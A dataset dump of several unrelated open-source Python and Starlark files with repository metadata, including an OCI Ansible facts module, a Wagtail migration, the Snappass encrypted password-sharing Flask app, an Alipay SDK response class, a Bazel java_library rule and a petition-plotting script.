- "The detailed status of INACTIVE lifecycleState.
Allowed values are:
- 1 - SUSPENDED
- 2 - DISABLED
- 4 - BLOCKED
- 8 - LOCKED"
returned: on success
type: int
sample: 56
is_activated:
description:
- Flag to indicate if the MFA TOTP device has been activated
returned: on success
type: bool
sample: true
sample: [{
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"user_id": "ocid1.user.oc1..xxxxxxEXAMPLExxxxxx",
"time_created": "2016-08-25T21:10:29.600Z",
"time_expires": "2016-08-25T21:10:29.600Z",
"lifecycle_state": "CREATING",
"inactive_status": 56,
"is_activated": true
}]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
try:
from oci.identity import IdentityClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class MfaTotpDeviceFactsHelperGen(OCIResourceFactsHelperBase):
def get_required_params_for_get(self):
return [
"user_id",
"mfa_totp_device_id",
]
def get_required_params_for_list(self):
return [
"user_id",
]
def get_resource(self):
return oci_common_utils.call_with_backoff(
self.client.get_mfa_totp_device,
user_id=self.module.params.get("user_id"),
mfa_totp_device_id=self.module.params.get("mfa_totp_device_id"),
)
def list_resources(self):
optional_list_method_params = [
"sort_by",
"sort_order",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_list_method_params
if self.module.params.get(param) is not None
)
return oci_common_utils.list_all_resources(
self.client.list_mfa_totp_devices,
user_id=self.module.params.get("user_id"),
**optional_kwargs
)
MfaTotpDeviceFactsHelperCustom = get_custom_class("MfaTotpDeviceFactsHelperCustom")
class ResourceFactsHelper(MfaTotpDeviceFactsHelperCustom, MfaTotpDeviceFactsHelperGen):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec()
module_args.update(
dict(
user_id=dict(type="str", required=True),
mfa_totp_device_id=dict(aliases=["id"], type="str"),
sort_by=dict(type="str", choices=["TIMECREATED", "NAME"]),
sort_order=dict(type="str", choices=["ASC", "DESC"]),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_facts_helper = ResourceFactsHelper(
module=module,
resource_type="mfa_totp_device",
service_client_class=IdentityClient,
namespace="identity",
)
result = []
if resource_facts_helper.is_get():
result = [resource_facts_helper.get()]
elif resource_facts_helper.is_list():
result = resource_facts_helper.list()
else:
resource_facts_helper.fail()
module.exit_json(mfa_totp_devices=result)
if __name__ == "__main__":
main()
| true
| true
|
790b3069425ae07e9b69a0a75534c8754c5f4767
| 2,284
|
py
|
Python
|
wagtail/tests/testapp/migrations/0014_m2m_blog_page.py
|
seddonym/wagtail-tableblock
|
aea3ce67a0800285b20b93018b7c0a8679e479b7
|
[
"BSD-3-Clause"
] | null | null | null |
wagtail/tests/testapp/migrations/0014_m2m_blog_page.py
|
seddonym/wagtail-tableblock
|
aea3ce67a0800285b20b93018b7c0a8679e479b7
|
[
"BSD-3-Clause"
] | null | null | null |
wagtail/tests/testapp/migrations/0014_m2m_blog_page.py
|
seddonym/wagtail-tableblock
|
aea3ce67a0800285b20b93018b7c0a8679e479b7
|
[
"BSD-3-Clause"
] | 1
|
2019-03-05T15:37:22.000Z
|
2019-03-05T15:37:22.000Z
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import wagtail.wagtailcore.fields
import modelcluster.fields
class Migration(migrations.Migration):
dependencies = [
('wagtailcore', '0020_add_index_on_page_first_published_at'),
('tests', '0013_iconsetting_notyetregisteredsetting_testsetting'),
]
operations = [
migrations.CreateModel(
name='BlogCategory',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),
('name', models.CharField(unique=True, max_length=80)),
],
),
migrations.CreateModel(
name='BlogCategoryBlogPage',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),
('category', models.ForeignKey(to='tests.BlogCategory', related_name='+')),
],
),
migrations.CreateModel(
name='ManyToManyBlogPage',
fields=[
(
'page_ptr',
models.OneToOneField(
primary_key=True,
serialize=False,
parent_link=True,
auto_created=True,
to='wagtailcore.Page'
)
),
('body', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('adverts', models.ManyToManyField(to='tests.Advert', blank=True)),
(
'blog_categories',
models.ManyToManyField(
to='tests.BlogCategory',
through='tests.BlogCategoryBlogPage',
blank=True
)
),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.AddField(
model_name='blogcategoryblogpage',
name='page',
field=modelcluster.fields.ParentalKey(to='tests.ManyToManyBlogPage', related_name='categories'),
),
]
| 34.606061
| 114
| 0.510508
|
from __future__ import unicode_literals
from django.db import models, migrations
import wagtail.wagtailcore.fields
import modelcluster.fields
class Migration(migrations.Migration):
dependencies = [
('wagtailcore', '0020_add_index_on_page_first_published_at'),
('tests', '0013_iconsetting_notyetregisteredsetting_testsetting'),
]
operations = [
migrations.CreateModel(
name='BlogCategory',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),
('name', models.CharField(unique=True, max_length=80)),
],
),
migrations.CreateModel(
name='BlogCategoryBlogPage',
fields=[
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),
('category', models.ForeignKey(to='tests.BlogCategory', related_name='+')),
],
),
migrations.CreateModel(
name='ManyToManyBlogPage',
fields=[
(
'page_ptr',
models.OneToOneField(
primary_key=True,
serialize=False,
parent_link=True,
auto_created=True,
to='wagtailcore.Page'
)
),
('body', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('adverts', models.ManyToManyField(to='tests.Advert', blank=True)),
(
'blog_categories',
models.ManyToManyField(
to='tests.BlogCategory',
through='tests.BlogCategoryBlogPage',
blank=True
)
),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
migrations.AddField(
model_name='blogcategoryblogpage',
name='page',
field=modelcluster.fields.ParentalKey(to='tests.ManyToManyBlogPage', related_name='categories'),
),
]
| true
| true
|
790b30b8fe31efd2d8b8814bd7607f2d2230fe09
| 5,404
|
py
|
Python
|
snappass/main.py
|
e2x/snappass
|
f7fbb4575ce59ee4c427ae087abcd462b867e01e
|
[
"MIT"
] | null | null | null |
snappass/main.py
|
e2x/snappass
|
f7fbb4575ce59ee4c427ae087abcd462b867e01e
|
[
"MIT"
] | null | null | null |
snappass/main.py
|
e2x/snappass
|
f7fbb4575ce59ee4c427ae087abcd462b867e01e
|
[
"MIT"
] | 1
|
2021-05-05T11:58:47.000Z
|
2021-05-05T11:58:47.000Z
|
import os
import re
import sys
import uuid
import redis
from cryptography.fernet import Fernet
from flask import abort, Flask, render_template, request
from redis.exceptions import ConnectionError
from werkzeug.urls import url_quote_plus
from werkzeug.urls import url_unquote_plus
NO_SSL = os.environ.get('NO_SSL', False)
TOKEN_SEPARATOR = '~'
# Initialize Flask Application
app = Flask(__name__)
if os.environ.get('DEBUG'):
app.debug = True
app.secret_key = os.environ.get('SECRET_KEY', 'Secret Key')
app.config.update(
dict(STATIC_URL=os.environ.get('STATIC_URL', 'static')))
# Initialize Redis
if os.environ.get('MOCK_REDIS'):
from mockredis import mock_strict_redis_client
redis_client = mock_strict_redis_client()
elif os.environ.get('REDIS_URL'):
redis_client = redis.StrictRedis.from_url(os.environ.get('REDIS_URL'))
else:
redis_host = os.environ.get('REDIS_HOST', 'localhost')
redis_port = os.environ.get('REDIS_PORT', 6379)
redis_db = os.environ.get('SNAPPASS_REDIS_DB', 0)
redis_client = redis.StrictRedis(
host=redis_host, port=redis_port, db=redis_db)
REDIS_PREFIX = os.environ.get('REDIS_PREFIX', 'snappass')
TIME_CONVERSION = {'week': 604800, 'day': 86400, 'hour': 3600}
def check_redis_alive(fn):
def inner(*args, **kwargs):
try:
if fn.__name__ == 'main':
redis_client.ping()
return fn(*args, **kwargs)
except ConnectionError as e:
print('Failed to connect to redis! %s' % e.message)
if fn.__name__ == 'main':
sys.exit(0)
else:
return abort(500)
return inner
def encrypt(password):
"""
Take a password string, encrypt it with Fernet symmetric encryption,
and return the result (bytes), with the decryption key (bytes)
"""
encryption_key = Fernet.generate_key()
fernet = Fernet(encryption_key)
encrypted_password = fernet.encrypt(password.encode('utf-8'))
return encrypted_password, encryption_key
def decrypt(password, decryption_key):
"""
Decrypt a password (bytes) using the provided key (bytes),
and return the plain-text password (bytes).
"""
fernet = Fernet(decryption_key)
return fernet.decrypt(password)
def parse_token(token):
token_fragments = token.split(TOKEN_SEPARATOR, 1) # Split once, not more.
storage_key = token_fragments[0]
try:
decryption_key = token_fragments[1].encode('utf-8')
except IndexError:
decryption_key = None
return storage_key, decryption_key
@check_redis_alive
def set_password(password, ttl):
"""
Encrypt and store the password for the specified lifetime.
Returns a token comprised of the key where the encrypted password
is stored, and the decryption key.
"""
storage_key = REDIS_PREFIX + uuid.uuid4().hex
encrypted_password, encryption_key = encrypt(password)
redis_client.setex(storage_key, ttl, encrypted_password)
encryption_key = encryption_key.decode('utf-8')
token = TOKEN_SEPARATOR.join([storage_key, encryption_key])
return token
@check_redis_alive
def get_password(token):
"""
From a given token, return the initial password.
If the token is tilde-separated, we decrypt the password fetched from Redis.
If not, the password is simply returned as is.
"""
storage_key, decryption_key = parse_token(token)
password = redis_client.get(storage_key)
redis_client.delete(storage_key)
if password is not None:
if decryption_key is not None:
password = decrypt(password, decryption_key)
return password.decode('utf-8')
@check_redis_alive
def password_exists(token):
storage_key, decryption_key = parse_token(token)
return redis_client.exists(storage_key)
def empty(value):
if not value:
return True
def clean_input():
"""
Make sure we're not getting bad data from the front end,
format data to be machine readable
"""
if empty(request.form.get('password', '')):
abort(400)
if empty(request.form.get('ttl', '')):
abort(400)
time_period = request.form['ttl'].lower()
if time_period not in TIME_CONVERSION:
abort(400)
return TIME_CONVERSION[time_period], request.form['password']
@app.route('/', methods=['GET'])
def index():
return render_template('set_password.html')
@app.route('/', methods=['POST'])
def handle_password():
ttl, password = clean_input()
token = set_password(password, ttl)
if NO_SSL:
base_url = request.url_root
else:
base_url = request.url_root.replace("http://", "https://")
link = base_url + url_quote_plus(token)
return render_template('confirm.html', password_link=link)
@app.route('/<password_key>', methods=['GET'])
def preview_password(password_key):
password_key = url_unquote_plus(password_key)
if not password_exists(password_key):
abort(404)
return render_template('preview.html')
@app.route('/<password_key>', methods=['POST'])
def show_password(password_key):
password_key = url_unquote_plus(password_key)
password = get_password(password_key)
if not password:
abort(404)
return render_template('password.html', password=password)
@check_redis_alive
def main():
app.run(host='0.0.0.0')
if __name__ == '__main__':
main()
| 27.292929
| 80
| 0.690044
|
import os
import re
import sys
import uuid
import redis
from cryptography.fernet import Fernet
from flask import abort, Flask, render_template, request
from redis.exceptions import ConnectionError
from werkzeug.urls import url_quote_plus
from werkzeug.urls import url_unquote_plus
NO_SSL = os.environ.get('NO_SSL', False)
TOKEN_SEPARATOR = '~'
app = Flask(__name__)
if os.environ.get('DEBUG'):
app.debug = True
app.secret_key = os.environ.get('SECRET_KEY', 'Secret Key')
app.config.update(
dict(STATIC_URL=os.environ.get('STATIC_URL', 'static')))
if os.environ.get('MOCK_REDIS'):
from mockredis import mock_strict_redis_client
redis_client = mock_strict_redis_client()
elif os.environ.get('REDIS_URL'):
redis_client = redis.StrictRedis.from_url(os.environ.get('REDIS_URL'))
else:
redis_host = os.environ.get('REDIS_HOST', 'localhost')
redis_port = os.environ.get('REDIS_PORT', 6379)
redis_db = os.environ.get('SNAPPASS_REDIS_DB', 0)
redis_client = redis.StrictRedis(
host=redis_host, port=redis_port, db=redis_db)
REDIS_PREFIX = os.environ.get('REDIS_PREFIX', 'snappass')
TIME_CONVERSION = {'week': 604800, 'day': 86400, 'hour': 3600}
def check_redis_alive(fn):
def inner(*args, **kwargs):
try:
if fn.__name__ == 'main':
redis_client.ping()
return fn(*args, **kwargs)
except ConnectionError as e:
print('Failed to connect to redis! %s' % e.message)
if fn.__name__ == 'main':
sys.exit(0)
else:
return abort(500)
return inner
def encrypt(password):
encryption_key = Fernet.generate_key()
fernet = Fernet(encryption_key)
encrypted_password = fernet.encrypt(password.encode('utf-8'))
return encrypted_password, encryption_key
def decrypt(password, decryption_key):
fernet = Fernet(decryption_key)
return fernet.decrypt(password)
def parse_token(token):
token_fragments = token.split(TOKEN_SEPARATOR, 1)
storage_key = token_fragments[0]
try:
decryption_key = token_fragments[1].encode('utf-8')
except IndexError:
decryption_key = None
return storage_key, decryption_key
@check_redis_alive
def set_password(password, ttl):
storage_key = REDIS_PREFIX + uuid.uuid4().hex
encrypted_password, encryption_key = encrypt(password)
redis_client.setex(storage_key, ttl, encrypted_password)
encryption_key = encryption_key.decode('utf-8')
token = TOKEN_SEPARATOR.join([storage_key, encryption_key])
return token
@check_redis_alive
def get_password(token):
storage_key, decryption_key = parse_token(token)
password = redis_client.get(storage_key)
redis_client.delete(storage_key)
if password is not None:
if decryption_key is not None:
password = decrypt(password, decryption_key)
return password.decode('utf-8')
@check_redis_alive
def password_exists(token):
storage_key, decryption_key = parse_token(token)
return redis_client.exists(storage_key)
def empty(value):
if not value:
return True
def clean_input():
if empty(request.form.get('password', '')):
abort(400)
if empty(request.form.get('ttl', '')):
abort(400)
time_period = request.form['ttl'].lower()
if time_period not in TIME_CONVERSION:
abort(400)
return TIME_CONVERSION[time_period], request.form['password']
@app.route('/', methods=['GET'])
def index():
return render_template('set_password.html')
@app.route('/', methods=['POST'])
def handle_password():
ttl, password = clean_input()
token = set_password(password, ttl)
if NO_SSL:
base_url = request.url_root
else:
base_url = request.url_root.replace("http://", "https://")
link = base_url + url_quote_plus(token)
return render_template('confirm.html', password_link=link)
@app.route('/<password_key>', methods=['GET'])
def preview_password(password_key):
password_key = url_unquote_plus(password_key)
if not password_exists(password_key):
abort(404)
return render_template('preview.html')
@app.route('/<password_key>', methods=['POST'])
def show_password(password_key):
password_key = url_unquote_plus(password_key)
password = get_password(password_key)
if not password:
abort(404)
return render_template('password.html', password=password)
@check_redis_alive
def main():
app.run(host='0.0.0.0')
if __name__ == '__main__':
main()
| true
| true
|
790b30bb249216e305afd822386e038ae1bd80bf
| 694
|
py
|
Python
|
alipay/aop/api/response/AlipayCommerceAntestCaselistQueryResponse.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 213
|
2018-08-27T16:49:32.000Z
|
2021-12-29T04:34:12.000Z
|
alipay/aop/api/response/AlipayCommerceAntestCaselistQueryResponse.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 29
|
2018-09-29T06:43:00.000Z
|
2021-09-02T03:27:32.000Z
|
alipay/aop/api/response/AlipayCommerceAntestCaselistQueryResponse.py
|
antopen/alipay-sdk-python-all
|
8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c
|
[
"Apache-2.0"
] | 59
|
2018-08-27T16:59:26.000Z
|
2022-03-25T10:08:15.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayCommerceAntestCaselistQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayCommerceAntestCaselistQueryResponse, self).__init__()
self._data = None
@property
def data(self):
return self._data
@data.setter
def data(self, value):
self._data = value
def parse_response_content(self, response_content):
response = super(AlipayCommerceAntestCaselistQueryResponse, self).parse_response_content(response_content)
if 'data' in response:
self.data = response['data']
| 26.692308
| 114
| 0.706052
|
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayCommerceAntestCaselistQueryResponse(AlipayResponse):
def __init__(self):
super(AlipayCommerceAntestCaselistQueryResponse, self).__init__()
self._data = None
@property
def data(self):
return self._data
@data.setter
def data(self, value):
self._data = value
def parse_response_content(self, response_content):
response = super(AlipayCommerceAntestCaselistQueryResponse, self).parse_response_content(response_content)
if 'data' in response:
self.data = response['data']
| true
| true
|
790b319ae4af0618d5e780d5ec1f5e926956e06f
| 3,240
|
bzl
|
Python
|
src/main/starlark/builtins_bzl/common/java/java_library.bzl
|
omarzl/bazel
|
2e723f228efee008bcfd62ceb74a176a357c4c32
|
[
"Apache-2.0"
] | null | null | null |
src/main/starlark/builtins_bzl/common/java/java_library.bzl
|
omarzl/bazel
|
2e723f228efee008bcfd62ceb74a176a357c4c32
|
[
"Apache-2.0"
] | null | null | null |
src/main/starlark/builtins_bzl/common/java/java_library.bzl
|
omarzl/bazel
|
2e723f228efee008bcfd62ceb74a176a357c4c32
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Definition of java_library rule.
"""
load(":common/java/java_common.bzl", "JAVA_COMMON_DEP")
load(":common/rule_util.bzl", "create_rule")
load(":common/java/java_semantics.bzl", "semantics")
load(":common/java/proguard_validation.bzl", "VALIDATE_PROGUARD_SPECS")
JavaInfo = _builtins.toplevel.JavaInfo
JavaPluginInfo = _builtins.toplevel.JavaPluginInfo
CcInfo = _builtins.toplevel.CcInfo
def _java_library_rule_impl(ctx):
if not ctx.attr.srcs and ctx.attr.deps:
fail("deps not allowed without srcs; move to runtime_deps?")
semantics.check_rule(ctx)
semantics.check_dependency_rule_kinds(ctx)
extra_resources = semantics.preprocess(ctx)
base_info = JAVA_COMMON_DEP.call(ctx, extra_resources = extra_resources, output_prefix = "lib")
proguard_specs_provider = VALIDATE_PROGUARD_SPECS.call(ctx)
base_info.output_groups["_hidden_top_level_INTERNAL_"] = proguard_specs_provider.specs
base_info.extra_providers.append(proguard_specs_provider)
java_info = semantics.postprocess(ctx, base_info)
return [
base_info.default_info,
java_info,
base_info.instrumented_files_info,
OutputGroupInfo(**base_info.output_groups),
] + base_info.extra_providers
java_library = create_rule(
_java_library_rule_impl,
attrs = dict(
{
"runtime_deps": attr.label_list(
allow_files = [".jar"],
allow_rules = semantics.ALLOWED_RULES_IN_DEPS,
providers = [[CcInfo], [JavaInfo]],
flags = ["SKIP_ANALYSIS_TIME_FILETYPE_CHECK"],
),
"exports": attr.label_list(
allow_rules = semantics.ALLOWED_RULES_IN_DEPS,
providers = [[JavaInfo], [CcInfo]],
),
"exported_plugins": attr.label_list(
providers = [JavaPluginInfo],
cfg = "exec",
),
"licenses": attr.license() if hasattr(attr, "license") else attr.string_list(),
},
**dict(
semantics.EXTRA_ATTRIBUTES,
**({
"classjar": attr.output(),
"sourcejar": attr.output(),
} if semantics.EXPERIMENTAL_USE_OUTPUTATTR_IN_JAVALIBRARY else {})
)
),
deps = [JAVA_COMMON_DEP, VALIDATE_PROGUARD_SPECS] + semantics.EXTRA_DEPS,
provides = [JavaInfo],
outputs = {} if semantics.EXPERIMENTAL_USE_FILEGROUPS_IN_JAVALIBRARY or semantics.EXPERIMENTAL_USE_OUTPUTATTR_IN_JAVALIBRARY else {
"classjar": "lib%{name}.jar",
"sourcejar": "lib%{name}-src.jar",
},
compile_one_filetype = ".java",
)
| 36.818182
| 135
| 0.674691
|
load(":common/java/java_common.bzl", "JAVA_COMMON_DEP")
load(":common/rule_util.bzl", "create_rule")
load(":common/java/java_semantics.bzl", "semantics")
load(":common/java/proguard_validation.bzl", "VALIDATE_PROGUARD_SPECS")
JavaInfo = _builtins.toplevel.JavaInfo
JavaPluginInfo = _builtins.toplevel.JavaPluginInfo
CcInfo = _builtins.toplevel.CcInfo
def _java_library_rule_impl(ctx):
if not ctx.attr.srcs and ctx.attr.deps:
fail("deps not allowed without srcs; move to runtime_deps?")
semantics.check_rule(ctx)
semantics.check_dependency_rule_kinds(ctx)
extra_resources = semantics.preprocess(ctx)
base_info = JAVA_COMMON_DEP.call(ctx, extra_resources = extra_resources, output_prefix = "lib")
proguard_specs_provider = VALIDATE_PROGUARD_SPECS.call(ctx)
base_info.output_groups["_hidden_top_level_INTERNAL_"] = proguard_specs_provider.specs
base_info.extra_providers.append(proguard_specs_provider)
java_info = semantics.postprocess(ctx, base_info)
return [
base_info.default_info,
java_info,
base_info.instrumented_files_info,
OutputGroupInfo(**base_info.output_groups),
] + base_info.extra_providers
java_library = create_rule(
_java_library_rule_impl,
attrs = dict(
{
"runtime_deps": attr.label_list(
allow_files = [".jar"],
allow_rules = semantics.ALLOWED_RULES_IN_DEPS,
providers = [[CcInfo], [JavaInfo]],
flags = ["SKIP_ANALYSIS_TIME_FILETYPE_CHECK"],
),
"exports": attr.label_list(
allow_rules = semantics.ALLOWED_RULES_IN_DEPS,
providers = [[JavaInfo], [CcInfo]],
),
"exported_plugins": attr.label_list(
providers = [JavaPluginInfo],
cfg = "exec",
),
"licenses": attr.license() if hasattr(attr, "license") else attr.string_list(),
},
**dict(
semantics.EXTRA_ATTRIBUTES,
**({
"classjar": attr.output(),
"sourcejar": attr.output(),
} if semantics.EXPERIMENTAL_USE_OUTPUTATTR_IN_JAVALIBRARY else {})
)
),
deps = [JAVA_COMMON_DEP, VALIDATE_PROGUARD_SPECS] + semantics.EXTRA_DEPS,
provides = [JavaInfo],
outputs = {} if semantics.EXPERIMENTAL_USE_FILEGROUPS_IN_JAVALIBRARY or semantics.EXPERIMENTAL_USE_OUTPUTATTR_IN_JAVALIBRARY else {
"classjar": "lib%{name}.jar",
"sourcejar": "lib%{name}-src.jar",
},
compile_one_filetype = ".java",
)
| true
| true
|
790b328b89c6f9bc48583162fd7cf5e176afc177
| 4,239
|
py
|
Python
|
network/get_sig_histogram.py
|
yukimasano/pet_forecast
|
57547fee4c222313e9c958536f60da4f43e23c8c
|
[
"MIT"
] | null | null | null |
network/get_sig_histogram.py
|
yukimasano/pet_forecast
|
57547fee4c222313e9c958536f60da4f43e23c8c
|
[
"MIT"
] | 1
|
2018-02-19T21:08:08.000Z
|
2018-02-23T10:45:57.000Z
|
network/get_sig_histogram.py
|
yukimasano/pet_forecast
|
57547fee4c222313e9c958536f60da4f43e23c8c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 28 12:54:52 2016
@author: YPC
"""
import matplotlib.pyplot as plt
import json
import numpy
f=open('../petitions.json', 'r')
met=json.load(f)
f.close()
s=[]
s2=[]
""" this plots the signature distribution function"""
if False:
for i in range(len(met)):
s.append( met[i]['petition']['signature_count'])
s=numpy.array(s)
s=sorted(s, reverse=True)
fig=plt.figure(figsize=(7, 4.5))
plt.rcParams.update({'font.size': 15})
plt.rc('font', family='serif')
plt.loglog(s,'-',color='darkblue',marker='x')
plt.loglog([1,len(s)],[100000,100000])
plt.loglog([1,len(s)],[10000,10000])
plt.title("Signatures distribution")
plt.xlabel("Rank")
plt.ylabel("Number of Signatures")
plt.tight_layout()
plt.legend(['Signatures','100,000','10,000'],loc=3,fontsize=12)
fig.savefig('Signatures_dist', dpi=500)
#%%
""" this plots the distr of len(text) """
if True:
for i in range(len(met)):
s.append( len(met[i]['petition']['description']))
if len(met[i]['petition']['description']) ==1000:
print met[i]['petition']['description']
fig=plt.figure(figsize=(4.5, 4.5))
plt.rcParams.update({'font.size': 15})
plt.rc('font', family='serif')
hist(s, bins=1000)
plt.title("Histogram of textlengths")
plt.ylabel("Number of petitions")
plt.xlabel("Length of text")
plt.tight_layout()
#fig.savefig('textlen_dist', dpi=500)
#%%
""" this plots the distr of len(text) """
if False:
for i in range(len(met)):
if met[i]['petition']['signature_count'] >1000:
s.append( len(met[i]['petition']['description']))
s2.append( len(met[i]['petition']['description']))
plt.rcParams.update({'font.size': 12})
plt.rc('font', family='serif')
_,bins, _= hist(s, bins=50)
fig, ax1 = plt.subplots()
fig.set_size_inches(7,4.5)
ax1.hist(s2,bins=bins,color='k',histtype='step')
ax1.set_ylabel('Petitions', color='k')
ax2 = ax1.twinx()
ax2.hist(s,bins=bins,color='b',histtype='step')
ax2.set_ylabel('Petitions with \n >1,000 signatures',color='b')
plt.title("Histogram of textlengths")
ax1.set_xlabel("Length of text")
plt.show()
fig.tight_layout()
fig.savefig('textlen_s_dist', dpi=500)
#%%
""" this plots the cum number of len(text)"""
if False:
k=0
for i in range(len(met)):
k=k+1
t = met[i]['petition']['created_datetime']
dt = t.encode()[0:10]
t0 = datetime.datetime(int(dt[0:4]),int(dt[5:7]),int(dt[8:10]))
s.append(t0)
s2.append(k)
fig, ax = plt.subplots()
fig.set_size_inches(8,3)
plt.rcParams.update({'font.size': 15})
plt.rc('font', family='serif')
ax.plot(s,s2,color='darkblue')
plt.title("Cumulative number of petitions")
plt.ylabel("Number of Petitions",fontsize=15)
ax.set_xlim([734300,735687])
for label in ax.xaxis.get_ticklabels()[1::2]:
label.set_visible(False)
ax.xaxis.get_ticklabels()[0].set_visible(True)
ax.xaxis.get_ticklabels()[-1].set_visible(True)
ax.tick_params(axis='both', which='major', labelsize=10)
plt.tight_layout()
fig.savefig('pets_vs_time', dpi=500)
#%%
if False:
for i in range(len(met)):
if int(met[i]['petition']['signature_count'])<100000 and int(met[i]['petition']['signature_count'])>5000:
print met[i]['petition']['id'], met[i]['petition']['signature_count']
#347 148373
#885 149470
#1535 113490
#2199 156218
#7337 258276
#8903 118875
#19149 118475
#19658 145544
#22321 102701
#22670 179466
#29349 154662
#29399 110704
#29664 108848
#31778 114499
#33133 117469
#35788 109306
#37180 174578
#38257 304255
#40925 106210
#41492 153828
#43154 104818
#45969 134835
#46455 170931
#48389 106410
#48628 104068
#49528 111572
#52740 110561
#53523 123881
#56810 107261
#58166 103063
#60164 113797
#62385 327877
#62490 123307
#63445 103479
#64331 118956
#64997 112285
#67165 124511
#67911 102170
#71455 118068
#73911 103841
#74830 135408
| 27.888158
| 114
| 0.610757
|
"""
Created on Mon Mar 28 12:54:52 2016
@author: YPC
"""
import matplotlib.pyplot as plt
import json
import numpy
f=open('../petitions.json', 'r')
met=json.load(f)
f.close()
s=[]
s2=[]
""" this plots the signature distribution function"""
if False:
for i in range(len(met)):
s.append( met[i]['petition']['signature_count'])
s=numpy.array(s)
s=sorted(s, reverse=True)
fig=plt.figure(figsize=(7, 4.5))
plt.rcParams.update({'font.size': 15})
plt.rc('font', family='serif')
plt.loglog(s,'-',color='darkblue',marker='x')
plt.loglog([1,len(s)],[100000,100000])
plt.loglog([1,len(s)],[10000,10000])
plt.title("Signatures distribution")
plt.xlabel("Rank")
plt.ylabel("Number of Signatures")
plt.tight_layout()
plt.legend(['Signatures','100,000','10,000'],loc=3,fontsize=12)
fig.savefig('Signatures_dist', dpi=500)
""" this plots the distr of len(text) """
if True:
for i in range(len(met)):
s.append( len(met[i]['petition']['description']))
if len(met[i]['petition']['description']) ==1000:
print met[i]['petition']['description']
fig=plt.figure(figsize=(4.5, 4.5))
plt.rcParams.update({'font.size': 15})
plt.rc('font', family='serif')
hist(s, bins=1000)
plt.title("Histogram of textlengths")
plt.ylabel("Number of petitions")
plt.xlabel("Length of text")
plt.tight_layout()
""" this plots the distr of len(text) """
if False:
for i in range(len(met)):
if met[i]['petition']['signature_count'] >1000:
s.append( len(met[i]['petition']['description']))
s2.append( len(met[i]['petition']['description']))
plt.rcParams.update({'font.size': 12})
plt.rc('font', family='serif')
_,bins, _= hist(s, bins=50)
fig, ax1 = plt.subplots()
fig.set_size_inches(7,4.5)
ax1.hist(s2,bins=bins,color='k',histtype='step')
ax1.set_ylabel('Petitions', color='k')
ax2 = ax1.twinx()
ax2.hist(s,bins=bins,color='b',histtype='step')
ax2.set_ylabel('Petitions with \n >1,000 signatures',color='b')
plt.title("Histogram of textlengths")
ax1.set_xlabel("Length of text")
plt.show()
fig.tight_layout()
fig.savefig('textlen_s_dist', dpi=500)
""" this plots the cum number of len(text)"""
if False:
k=0
for i in range(len(met)):
k=k+1
t = met[i]['petition']['created_datetime']
dt = t.encode()[0:10]
t0 = datetime.datetime(int(dt[0:4]),int(dt[5:7]),int(dt[8:10]))
s.append(t0)
s2.append(k)
fig, ax = plt.subplots()
fig.set_size_inches(8,3)
plt.rcParams.update({'font.size': 15})
plt.rc('font', family='serif')
ax.plot(s,s2,color='darkblue')
plt.title("Cumulative number of petitions")
plt.ylabel("Number of Petitions",fontsize=15)
ax.set_xlim([734300,735687])
for label in ax.xaxis.get_ticklabels()[1::2]:
label.set_visible(False)
ax.xaxis.get_ticklabels()[0].set_visible(True)
ax.xaxis.get_ticklabels()[-1].set_visible(True)
ax.tick_params(axis='both', which='major', labelsize=10)
plt.tight_layout()
fig.savefig('pets_vs_time', dpi=500)
if False:
for i in range(len(met)):
if int(met[i]['petition']['signature_count'])<100000 and int(met[i]['petition']['signature_count'])>5000:
print met[i]['petition']['id'], met[i]['petition']['signature_count']
| false
| true
|
790b3468a36f769806063323bf41611a538801a6
| 5,280
|
py
|
Python
|
tensorflow/tensorboard/plugins/projector/projector_plugin_test.py
|
garston2/tensorflow
|
bbe056e5a0ab81b67fcb6053400812b3d5805fc7
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/tensorboard/plugins/projector/projector_plugin_test.py
|
garston2/tensorflow
|
bbe056e5a0ab81b67fcb6053400812b3d5805fc7
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/tensorboard/plugins/projector/projector_plugin_test.py
|
garston2/tensorflow
|
bbe056e5a0ab81b67fcb6053400812b3d5805fc7
|
[
"Apache-2.0"
] | null | null | null |
